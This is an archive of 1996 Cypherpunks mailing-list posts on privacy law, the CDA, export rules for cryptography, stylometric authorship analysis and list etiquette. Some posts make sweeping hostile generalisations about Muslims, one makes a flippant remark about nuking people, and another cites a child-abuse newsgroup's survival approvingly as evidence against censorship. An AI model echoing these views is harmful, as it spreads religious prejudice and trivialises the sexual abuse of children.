From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 16 Feb 1996 21:15:47 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <Pine.SUN.3.91.960216105547.22887B-100000@scorpio.gold.ac.uk>
Message-ID: <199602161251.HAA29650@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I have tried sending people comments in private mail, but that doesn't
seem to work.

This is NOT IslamPunks. This is totally off topic. Can you guys
discuss this privately instead?

.pm

Sean Gabb writes:
> I never visited Nazi Germany, or the Soviet Union under Stalin; but I 
> think I am justified in regarding them as nasty places, hostile to any 
> concept of liberal civilisation.  Equally, though I have done my best to 
> avoid visiting the Islamic world, I have seen enough *religious* Moslems 
> here in England, and read enough of their material, to know that Islam is 
> more often than not a force for evil.
> 
> Turning to literature, I have read my way through dozens of pamphlets 
> sent me by the Islamic Propagation Centre International of Birmingham - 
> the one that strikes me as most hilariously dishonest is "The Status of 
> Women in Islam" by Dr Jamal A. Badawi.  I will upload a review of this 
> tomorrow.  I also have a copy of the Koran, translation and Commentary by 
> A. Yusuf Ali; and I have read much of Al Ghazali and a French version of 
> "The Regency of the Theologian" by the late Ruholla Khomeini.
> 
> Of course, even if I list everything I have read about Islam or by 
> Moslems, and read three times more, you would still come on this list 
> questioning my right to form an opinion.  One tactic - used ad nauseam by 
> the socialists - is to dismiss whatever I have read as works 
> unrepresentative of the true essence and canon.  Well, I say that I know 
> quite enough about Islam to regard it as a horrible religion.  I still 
> disagree with Tim as to what response is appropriate.  But I agree with 
> him that it would be a nasty day for humanity if Islam were ever to 
> become the faith of a powerful and expansionist state.
> 
> Sean Gabb,
> Editor
> Free Life.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 17 Feb 1996 01:56:57 +0800
To: Tim Philp <tcmay@got.net>
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602161554.HAA25202@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 2/14/96 -0500, Tim Philp wrote:
>	If I apply for a credit card and use it to buy a hockey glove (how
>Canadian eh) I should not expect to be on the mailing list of every
>sporting goods operation in North America!
>
> [...]
>
>	Again, I am not suggesting prior restraint. I simply want to sue 
>the bastards who violated my expectation of privacy.

1.  All so called privacy laws against databases *have* involved 
prior restraint, and thus necessarily involved massive violation 
of privacy by the state.

2.  Absent prior restraint, you may have great difficulty discovering 
whole leaked information concerning you.

3.  Such a law as you propose, without prior restraint, would not 
violate peoples privacy, and for that very reason it is vastly 
unlikely that such a law would ever be passed.  The primary purpose
of laws against acts that are malum prohibitum and not malum in se 
is to empower those that pass them, and the secondary purpose is
to empower established businesses that are threatened by competition.
(The digital telephony act should be called the big three 
preservation act.)

When you say "There ought to be a law", ask yourself who would pass 
such a law, who would enforce such a law, and why.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Fri, 16 Feb 1996 21:48:47 +0800
To: cypherpunks@toad.com
Subject: re True democracy in America.
Message-ID: <199602161324.HAA01206@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


>}Is ok. I suspect that we are narrowing on a similar position. Would like
>}to see a time when net communications make "representatives of the people"
>}obsolete" since majority voting on any issue can be "anytime,anywhere".
>}Doubt that it will happen soon.
>
><rm>
>
>I too would like to see a purely democratic process rather than a
>representative one.  And I also agree that it won't happen soon.  The
>question is, what do we keep of govt?

In my opinion, only the most basic of services, trash collection, road 
maintenance, education (decided upon experts, not just people with opinions. 
I don't claime to be an expert on history, so why should I have a say on how it 
is tought, I have no expertise in that area).

In a true democracy, which is based on a very diverse general populace, will 
result in a system that will not be able to pass any legislation except those 
described above, it will be imporable for the majority to agree to anything 
except the most basic things.


Why I hate this goverment is that it tries to decide what is right and wrong, 
that is my decision, not theirs.  I am accountable to me and my God as to what 
I do with my life, I am not accountable to any society as long as I do not 
infrige on someone elses rights.

Unfortunalty, I don't see such a goverment happening, I don't care about if 
anyone else likes the way I choose to conduct my life or not, but the majority 
of any country has this assine persistance to perpetuate their traditions and 
beliefs on others, it is their form of progegation.  It's true what is being 
said  sometimes you just gotta Nuke'em
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 17 Feb 1996 02:47:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602161631.IAA25897@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain



James Donald writes:
>[in reply to strata]
>> Your other arguments casually dismiss the very real power that large numbers 
>> of able people with good communications can exercise, have just exercised
>> very recently.

At 05:03 AM 2/16/96 -0500, lmccarth@cs.umass.edu wrote:
>Large numbers of able people with good communications very recently exercised 
>their putative "very real power" against the passage of the CDA. They had no
>substantial impact AFAICS. (I intend no slur against the effort.)  Could you
>name some examples, and add some qualifications that made the difference in
>those cases ?

1.  President Clinton declared CDA unconstitutional and directed 
the Justice department to refrain from enforcing it.

2.  The normal course of events, when a new medium starts 
competing against an old medium, is for the new medium to 
be censored to an utterly ludicrous degree, analogous to 
the law requiring a man with a red flag to walk in front 
of horseless carriages, while the old medium has censorship 
radically relaxed.  In the normal course of events one would 
expect a strict ban on pictures of women in clothes cut 
below the neck or above the ankles, and a ban on any 
unpleasant or disturbing subject.  (For example the comics 
code, and the TV rule that married couples had to have 
separate beds)

Instead alt.pictures.binaries.erotica.children is still 
going strong.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 17 Feb 1996 04:30:26 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Decency Act
Message-ID: <m0tnT11-0008zfC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:50 AM 2/16/96 -0500, t byfield wrote:
>At 9:43 PM 2/15/96, jdoe-agamemnon@alpha.c2.org wrote:
>
>>>Perry sent me a polite note asking why I had posted the original post, and
>>>He suggested that in the future I make it clear why I think my posts are
>>>relevent to the subject of the list.
>>
>>Is this what we call the chilling effect?
>
>        No.
>        bell@pacifier--surely not a coincidence--has indulged himself
>excessively. Anyone checked out the LD angle on him?

Hey, I resent the implication, here!  Three months ago I wouldn't have known 
what you meant by that, but "comparatively" long ago I learned that "LD" is 
Detweiler, who apparently has a long and established history of using 
aliases.  It sounds like you're trying to imply that I am either a Detweiler 
"tentacle" (yet another term of art that I learned in the last couple of 
months) or am somehow in league with him.  Right?!?

Well, "It ain't so."  Now, I realize how difficult it is for me to prove 
that I'm not some other particular person, but from the snippets I've 
managed to see over the last few months on Internet, this Detweiler 
character appears to know FAR more about the use of Internet than I do. (He 
apparently is a sleazy bastard, but then you probably know much more about 
that than I do...)  Hell, it was only a couple of months ago that I even 
learned how to use PGP with Eudora.  I've only had a full SLIP account for a 
few months before that.

In fact, so far (luckily for me, I guess) my only contact with LD is that I 
was flamed by him, actually under the Detweiler name, when I first posted 
"Assassination Politics" to various USENET areas.  At that point, I had no 
idea of his checkered history (still don't know much; I'd appreciate hearing 
more) and he apparently assumed that I was some Tim May clone.  He even 
referred to May as "TCM," a set of initials that mystified me for a week, 
until some kind soul sent me a small snippet of the Cybernomicon, the part 
dealing with "net-killings."

At that point, he ignored me, probably classifying me as a clueless newbie.  
His flaming ceased when he discovered that I was not only not "in the TCM 
camp," but I hadn't even heard of May and Cypherpunks.

In any case, as I understand it from vague commentary, some of you people 
"out there" know a lot more about LD, and it should be possible for me to 
show my history in enough detail to convince anybody that I'm not Detweiler. 
 Hell, somebody posted my correct address just a few hours ago (it was no 
secret; I am well aware of USENET indexing, and I've freely published my 
address and the correct, current phone number in a USENET area within the 
last couple of months, and I've never had an unlisted telephone number.

Jim Bell, N7IJS, 7214 Corregidor, Vancouver, WA, USA 98664, 360-696-3911  
(they changed area codes from 216 last year),  MIT Class of 1980, Course 5, 
Chemistry major.

"James Dalton Bell"  (yes, THOSE Daltons!)


jimbell@pacifier.com


Klaatu Burada Nikto.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSSvq/qHVDBboB2dAQG89AP8D+Wv6oXk3Yj0gcLg6pPP7DNvEhQCQG1j
q8UzCvz/lA0d2Pv+DR5KCAsgCeWD3H2b5435GrYt4jsUhOSBmwZ4C1KFdogBon5D
ELvbNwLyNtf6GGaqeAxlD/ztJ/MMuoPAaohi4tZuUhEnMGe7JMV5UlMHgnSfyRQ+
SKyM7bHg2io=
=qC3l
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sasha1@netcom.com (Alexander Chislenko)
Date: Sat, 17 Feb 1996 04:49:07 +0800
To: pcw@access.digex.net
Subject: Re:  Computer unmasks Anonymous writer...
Message-ID: <199602161720.JAA05092@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  I ran my essays through Word grammar checker a while ago,
and was surprised how stable the grammar statistics were.
Complexity of the text (grade level) was the same to the decimal point,
average length of sentences was consistent, etc.
People also use the same styles of smileys or *highlights*, make
consistent spelling errors, have their habits of indentation, etc.

My suggestion at the time was to have randomizing output filter that
would substitute synonyms, change spelling, modify paragraph formatting,
etc.  - Style anonymizer, I'd call it.  Also, if small random changes are
applied to every copy of the message you send out, and you keep track of
what recipient got which version, you will find it easier to identify
the leaks if you send private messages.  A dishonest recipient, to
protect himself, would have to further randomize the message, which
has apparent consequences for the ease of your identification and attributability of the message.

  Of course there are  more subtle consistencies of style one can't easily
mask with a filter - but they are not easy to detect either.

-----------------------------------------------------------
| Alexander Chislenko | sasha1@netcom.com | Cambridge, MA | 
| Home page:  http://www.lucifer.com/~sasha/home.html     |
-----------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 16 Feb 1996 23:18:47 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Decency Act
Message-ID: <199602161441.JAA14966@pipe12.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 15, 1996 21:43:49, 'jdoe-agamemnon@alpha.c2.org' wrote: 
 
 
>Bill Frantz wrote: 
>>Perry sent me a polite note asking why I had posted the original post,
and 
>>He suggested that in the future I make it clear why I think my posts are 
>>relevent to the subject of the list. 
> 
>Is this what we call the chilling effect? 
> 
 
No, certainly not in the *meaning* of the term. 
 
One: P.E. Metzger is an individual, not a state. To put it in context, "how
many [Army] divisions does Perry have?" 
 
Two: People publish a variety of opinions to the cypherpunk list. These
have included murder for hire and the mass destruction of civilians via
nuclear weapons. Surely P.E. Metzger is entitled to post his opinions, far
more topical to CP-List than the others. 
 
Three: The mathemetician Heri Poncaire once wrote that a properly prepared
scientific proof had the effect of "compelling" belief whether the person
vewing the proof wanted to believe in it or not. Put another way, any proof
in the HP sense has a chilling effect on all belief structures opposed to
the proof. This "chilling effect" is not what is meant by the same words
used to refer to government action. It is, perhaps, a type of "chilling
effect" that scientifically-oriented people would support. Now obviously,
P.E. Metzger's post and request is not a scientific proof. It might lead
some individuals to refrain from posting clearly off-topic material. The
same individuals may get upset at this new-found consciousness and be upset
at it. They might even decide their original unmediated desires had been
"chilled" by P.E. Metzger's request. So what? 
 
--tallpaul 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Sat, 17 Feb 1996 00:21:33 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: berkeley site kinda' up
Message-ID: <199602161512.KAA02293@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Well, I got in to ftp://ftp.csua.berkeley.edu/ but it seems that 
none of the filesystems are mounted.

A nice, clean space.  Any news on what's happening?

- -----
    Mark Rogaski     | wendigo@gti.net | wendigo@pobox.com |  I use PGP, so
System Administrator |   http://www.pobox.com/~wendigo/    |    should you!
Global Telecom, Inc. | Why read when you can just sit and  | finger for pubkey
  http://w3.gti.net/ |          stare at things?           | wendigo@pobox.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSSc09T48ZIkMoEtAQGhYQf9FTxwG4lTpGJ2Rc1DtcsmjOvhnM2eTxvJ
zLy9WFo5Hr3W2jSAoQ7VWmfr5ZgcCuyiPtxnkTHfXBqWNS4SnJ5BCYmGhAmLu+WW
EMTPXmmeLN/R2vsLCfetmII+/WR2SKvShU8TOTHSrsEZQnbz56AWUVexEs86kvKY
q+dJFQadjTmQDdhIh/+jXIeJfccpRujBu7MOb7kWnbmC4VoMVDrKRh+73bcj+4+g
Zm+ptTgn8NVCHyjn+Ydy9jU8H2bymQnQl1YsqcAmhrKW9cpB04ijXKM3rGQl99OS
kc+qlT1Kwvf4laLHOcFcjKPIWV0o0WRExJhoapgpN6gUfmSWM3LDXg==
=nOvQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@access.digex.net>
Date: Sat, 17 Feb 1996 00:40:17 +0800
To: cypherpunks@toad.com
Subject: Computer unmasks Anonymous writer...
Message-ID: <199602161525.KAA28647@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




The Feb 16, 96 edition of the Baltimore Sun announces that a computer
program similar to one used to attribute unknown poems to William
Shakespeare has been turned to solving the mystery of who wrote
the best selling book, _Primary Colors._ The work was apparently
done by Donald Foster a professor at Vassar College who discovered
that both Joe Klein and the author of _Primary Colors_ used these
adjectives quite often:

especially, entirely, fiercely, incredibly, mortally, particularily,
precisely, profoundly, reflexively, relentlessly, seriously, subtly,
surprisingly, ultimately, utterly, vaguely, wistfully

More information will be published in an article slated to run in the
copy of _New York_ magazine that goes on sale on Monday. This article
seems to be the major source for the Sun piece.

If Joe Klein, a well-known political writer, is indeed the author, it
is clear that he didn't learn one of the first lessons of Washington.
If you're going to leak information or quotes to the world, make sure
you use the diction of your enemy. That's ventriloquism Washington
style.

-Peter Wayner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 17 Feb 1996 01:52:45 +0800
To: cypherpunks@toad.com
Subject: Computer unmasks Anonymous writer...
Message-ID: <199602161550.KAA02337@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Wash Post today also covers fingering Joe Klein by 
stylistic analysis, gives Klein's denial and in a separate 
article reports on the methodology of its own computer analysis 
and most likely suspects, who are ...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lane@sutm.2sprint.net (Lane Maxwell)
Date: Sat, 17 Feb 1996 04:20:07 +0800
To: cypherpunks@toad.com
Subject: hawkenet.com
Message-ID: <9602161704.AA18970@sutm.2sprint.net>
MIME-Version: 1.0
Content-Type: text/plain


I have been trying to log into hawkenet.com for the past few days. Does
anyone know what is wrong with it? It seems to have some pretty interesting
stuff on it. 
                                                        Lane





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Fri, 16 Feb 1996 20:11:51 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <Pine.SV4.3.91.960215205427.20308D-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960216105547.22887B-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Feb 1996, Alan Horowitz wrote:

> On Thu, 15 Feb 1996, Sean Gabb wrote:
> 
> > where Islam is concerned, there 
> > are so many individuals behaving badly that we are justified in thinking 
> > the whole religion a force for bad.
> 
> > But the fact is that most Moslems 
> > venerate old men in beards, who think that anyone who disagrees 
> > with them about God should be put to death, that a woman with a 
> > clitoris is a kind of devil, and that Western classical music is evil.
> 
> 
>     And your travels in the Islamic world consist of?   And you 
> personally know how many Muslims?  And you have read how much Islamic 
> sources?
> 
I never visited Nazi Germany, or the Soviet Union under Stalin; but I 
think I am justified in regarding them as nasty places, hostile to any 
concept of liberal civilisation.  Equally, though I have done my best to 
avoid visiting the Islamic world, I have seen enough *religious* Moslems 
here in England, and read enough of their material, to know that Islam is 
more often than not a force for evil.

Turning to literature, I have read my way through dozens of pamphlets 
sent me by the Islamic Propagation Centre International of Birmingham - 
the one that strikes me as most hilariously dishonest is "The Status of 
Women in Islam" by Dr Jamal A. Badawi.  I will upload a review of this 
tomorrow.  I also have a copy of the Koran, translation and Commentary by 
A. Yusuf Ali; and I have read much of Al Ghazali and a French version of 
"The Regency of the Theologian" by the late Ruholla Khomeini.

Of course, even if I list everything I have read about Islam or by 
Moslems, and read three times more, you would still come on this list 
questioning my right to form an opinion.  One tactic - used ad nauseam by 
the socialists - is to dismiss whatever I have read as works 
unrepresentative of the true essence and canon.  Well, I say that I know 
quite enough about Islam to regard it as a horrible religion.  I still 
disagree with Tim as to what response is appropriate.  But I agree with 
him that it would be a nasty day for humanity if Islam were ever to 
become the faith of a powerful and expansionist state.

Sean Gabb,
Editor
Free Life.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 17 Feb 1996 06:37:42 +0800
To: perry@piermont.com
Subject: Re: True democracy the electronic way
In-Reply-To: <199602152143.QAA27240@jekyll.piermont.com>
Message-ID: <199602161919.LAA09379@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PM:

>For those not in the know, I will point out for the record that
>Vladimir Z. Nuri is actually L. Detweiler and that you are watching a
>form of strange masked dance in which everyone pretends that they
>don't know who the other person is. We now return you to the surreal
>dialog already in progress.

hmmmmm, sounds like a ridiculous conspiracy theory to me, concocted
mrely to further inflame TCM warefare by inciting both him and
those critical of him. (methinks you have been staring at crypto
code for sockets and slaving over a hot monitor a bit too long.)

note: I have absolutely no interest of playing the puerile cyberspatial
identity games the cypherpunks have come to be famous for.

but thanks for a great laugh (at you, not with you).

(but, shall I remind you, all these conspiracy theories you raise
are WHOLLY IRRELEVANT to the cypherpunks list.)

say PM, you are into capitalism and the free market economy as
transcendent and sacred and all that-- what would you
charge to not post to this list for say several months? a little
vacation for someone clearly overworked and fatigued? I'd be
willing to take up a collection. you might be surprised how much
people donate ... there even maybe one or two "wealthy contributors"
who really up the ante. don't take it personally-- I really am
concerned for your welfare and serenity of mind, something that seems
to endlessly elude you as much as the perfectly relevant cypherpunk post..

p.s. a little note to everyone here who doesn't "get it"-- a 
guerilla measures his effectiveness by the presence of *any* response.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Fri, 16 Feb 1996 20:41:47 +0800
To: tallpaul <tallpaul@pipeline.com>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <199602160408.XAA12403@pipe11.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960216111339.22887C-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Feb 1996, tallpaul wrote:

> Why oh why am I getting the idea that "cypherpunks" would better be called
> "cryptoauthoritarians." From murder-as-political-liberation, to the
> universalization of the libertarians "feelings" onto everyone else in the
> world, to the mass nuclear bombings of civilians to the mass nuclear
> elimination of religions. 
>  
> My, my. For a group of people so uspet at taxes you certainly have faith in
> the ability of private individuals to generate the capital for things like
> the Manhattan Project and high-cost nuke delivery systems! 
>  
> On Feb 15, 1996 20:03:56, 'Sean Gabb <cea01sig@gold.ac.uk>' wrote: 
>  
>  
> >True, there are risks in generalising from the actions of one individual  
> >to the group as a whole.  Nevertheless, where Islam is concerned, there  
> >are so many individuals behaving badly that we are justified in thinking  
> >the whole religion a force for bad. 
> > 
> >Doubtless, I shall be told that "true Islam" is "true tolerance", "true  
> >freedom", and even "true apple pie".  I may be told that the horrors of  
> >actually existing Islam - remember this phrase, or something like it? -  
> >are all somehow the fault of the West.  But the fact is that most Moslems 
> 
> >venerate old men in beards, who think that anyone who disagrees  
> >with them about God should be put to death, that a woman with a  
> >clitoris is a kind of devil, and that Western classical music is evil. 
> > 
> >By my standards, these people are disgusting.  My only dispute with Tim  
> >is in our manner of expressing our disgust. 
> > 
> >Sean Gabb 
> >Editor 
> >Free Life. 
> > 
>  
>  
> I was wondering if S. Gabb, as a self-declared expert on Islam, if he might
> explain the difference between the Sunni and Shi'ite sects, and the
> respective size of each? 

Yes, Mr Tallpaul, I see you are upset by my reply to your threat to have 
me arrested in London and dragged off to New York to face trial for 
having sent messages to this list that found their way to you.  As I 
understand it, the division between the Shiites and Sunnites goes back to 
a dispute in the seventh century between Ali, the son-in-law of Mahomet, 
and Muawiya, the Caliph of the time.  Since then, the Shiites have 
divided and dubdivided into many sects, while the Sunnites have remained 
more or less united.  To this extent, the division within Islam is 
similar to that between Catholics and Protestants - though I wouldn't 
like to draw any comparisons between the doctrinal disputes of Islam and 
Christianity.

As for their respective sizes, estimates vary; but the proportion 
most commonly given between Shiites and Sunnites is 15:85.  If you have 
other figures, doubtless you will post them.

>  
> I am also curious if he could point us to a single written example where he
> or anyone else has ever been told the various things that he "doubtless"
> will be told? 
>  
Yes, Mr Tallpaul, I can and will.  You should consult the various 
publications of the Islamic Propagation Centre International, at 481 
Coventry Road, Birmingham, B10 0JS, England, fax - **121 766 8577.  You 
will find enough there to have any sceptic wetting himself with laughter.

> In short, is this important history posted on cypherpunks, more libertarian
> political demagogery,  or another J. Bell-like reference to the
> universalization of the libertarian's feelings onto the rest of the world? 
>  
In fairness, this is a good point.  I accept that a list that I joined in 
order to read about Phil Zimmerman and pgp is not the best place for 
discussing the horrors of Islam.  I will therefore say no more on the 
subject - not even uploading the review I promised in an earlier 
posting.  I shall return to lurking.

Sean Gabb
Editor
Free Life
(I would remind you all that another issue of this comes out in March, 
but Mr Tallpaul might persuade his government to do to me what it did to 
General Noriega)

> 
--tallpaul >   "Gentle Jesus >   "Meek and mild >   "Bless me 
>   "While I nuke this child. 
>   "But reassure'em 
>   "As I wack'em 
>   "I love their rights; 
>   "I'll never tax'em."
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 17 Feb 1996 03:36:40 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: ITAR personal use exemption in force
Message-ID: <Pine.SUN.3.91.960216112253.12374J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


61 Federal Register 6111 (Feb. 16,  1996)
To be codified at 22 CFR parts 123 & 126
Effective today.

Excerpts:


	"After extensive review, the Department of State has decided to 
further amend the regulations to provide for an exemption for the 
temporary export of products for personal use.  The exemption does not 
apply to other circumstances, for example, those in which a person 
contemplates sales, marketing or demonstration....

	... for purposes of this exemption, a product is considered to be 
in the possession of the exporter if the exporter takes normal  
precautions to ensure the security of the product by locking the product 
in a hotel room, safe, or other comparably secure location; and, while in 
transit, the exporter keeps the product in his/her carry-on luggage or 
locked in baggage accompanying the exporter which has been checked with 
the carrier.

	This amendment involves a foreign affairs function of the United 
States and thus is exploded from the procedures of [ordinary rulemaking].

	However, interested parties are invited to submit risen comments 
to the Department of State, Director, office of Defense trade Controls,  
attention: regulatory change, personal use cryptographic products, Rome 
200, SA-6, Washington, DC 20520-0602.

  [The above was dictated using voice-recognition software, so beware of  
strange word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 17 Feb 1996 05:14:53 +0800
To: cypherpunks@toad.com
Subject: Re: Computer unmasks Anonymous writer...
In-Reply-To: <199602161525.KAA28647@access1.digex.net>
Message-ID: <199602161745.LAA16950@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> The Feb 16, 96 edition of the Baltimore Sun announces that a computer
> program similar to one used to attribute unknown poems to William
> Shakespeare has been turned to solving the mystery of who wrote
> the best selling book, _Primary Colors._

Suppose you didn't trust the from fields in usenet articles, and you
wanted to index everything so that you could pull up articles that appear
to have been written by the same person.  How would you go about doing
this?  Would you set up n statistical measures for text, assign each
article an n-tuple, and look for points that are near each other? 

Isn't this a similar problem to indexing satellite photos or 
fingerprints?  How good are the spooks at doing that sort of thing?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 17 Feb 1996 04:12:48 +0800
To: cypherpunks@toad.com
Subject: LUP_hol
Message-ID: <199602161658.LAA05879@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Two TWP reports on the future of US intelligence and
   use of nonofficial cover (NOC):

   "Don't Hobble Intelligence Gathering," 2-15-96.

      An op-ed by Richard Haass, principal author of a just
      released report on the future of intelligence by the
      Council on Foreign Affairs, which, among other things,
      proposes lifting the ban on use of journalists and
      clergy as cover. [We expect to get this report shortly
      and will offer it here; CoFA says the first printing was
      snapped up so there should be more news reports.]

   "Loophole Revealed in Prohibition on CIA Use of
   Journalistic Cover," 2-16-96.

      Which reports that by special waiver the CIA continues
      to use journalists as covert agents despite the 1977 
      ban. Ex-National Security Council staffer Haass and 
      an ex-DCI panelist of the CoFA study claim they were 
      unaware of the loophole OKable only by the DCI. Hmm.

   LUP_hol












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 17 Feb 1996 04:11:57 +0800
To: dcsb@ai.mit.edu
Subject: DCSB: Tales from the Dark Side: Non-Anonymous Digital Cash?
Message-ID: <v02120d03ad4a61d362eb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                             Mark Bernkopf

                        Tales from the Dark Side:
                       Non-Anonymous Digital Cash?


                        Tuesday, March 5, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



This past autumn, Mark wrote a couple of studies on electronic money.  He
will offer some general thoughts on likely winners and losers of the
cash-card competition.  Mark opposes totally untraceable electronic cash.  He
is skeptical of private currencies, although he concedes one type of private
currency that might succeed.


Since late 1993, Mark Bernkopf has been an economic and financial policy
analyst at Bruce Morgan Associates, Inc., a small international consultancy
in Arlington, VA.  He prepares a semi-annual World Economic Outlook, and
writes on such subjects as central banking and monetary policy, currency
boards, the economics of Korean reunification, derivatives, bancassurance,
and industrial policy.  His firm's clients are mostly Middle Eastern
governments and large East Asian corporations and thinktanks.

In previous "incarnations" Mark served at the Clinton White House Office of
Communications and at the Open Market Operations Department of the Federal
Reserve Bank of New York.  He is a Wharton grad and a clandestine contributor
to Pasi Kuoppamäki's "Jokes about Economists and Economists"
http://www.etla.fi/pkm/joke.html



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, March 5, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, March 2, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 April       Donald Eastlake  CyberCash
 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC
 July        Pete Loshin      Author, "Electronic Commerce"
 August      Duane Hewitt     Idea Futures

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSS2l/gyLN8bw6ZVAQEtHQP9GoForXlqC37poPqWsXJmjTM+4oNuxrt6
uWDxNeshrJcn1bzwr3pumKQo/5ep+2x0+SSK4Ay2DMmNZwt/vYI/UvaWsfQoRQVg
t4vJ3cZQ4/ESuZ5lMbDORPUoUFwcxcJf0qcw0AXT0asZBFfaqRajg98bSqIQECYO
6mNXIuGtoqk=
=pR6y
